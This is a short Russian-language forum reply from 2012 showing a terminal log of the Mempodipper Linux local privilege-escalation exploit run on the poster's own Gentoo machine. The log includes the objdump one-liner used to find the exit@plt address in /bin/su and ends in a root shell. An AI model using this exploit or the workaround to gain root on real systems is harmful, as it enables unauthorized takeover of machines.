« Ответ #1 : Январь 24, 2012, 10:47:41 am »
Пруф на локалхосте
---
Правда эксплойту пришлось "помочь"
pascal@0day ~ $ cpp/./exp_proc
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/31340/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[-] Could not resolve /bin/su. Specify the exit@plt function address manually.
[-] Usage: cpp/./exp_proc -o ADDRESS
[-] Example: cpp/./exp_proc -o 0x402178
pascal@0day ~ $ su
Password:
0day pascal # objdump -d /bin/su | grep 'exit@plt' | tail -1 | awk '{print $8}'
402100
0day pascal # exit
pascal@0day ~ $ cpp/./exp_proc -o 0x402100
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/31389/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x4020f4.
[+] Executing su with shellcode.
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),16(cron),18(audio),19(cdrom),27(video),100(users)
sh-4.1# uname -srm
Linux 3.2.0-gentoo x86_64
« Последнее редактирование: Январь 24, 2012, 10:58:20 am от Pascal »
Записан
cout << "Shalom World!\n"; // (с)
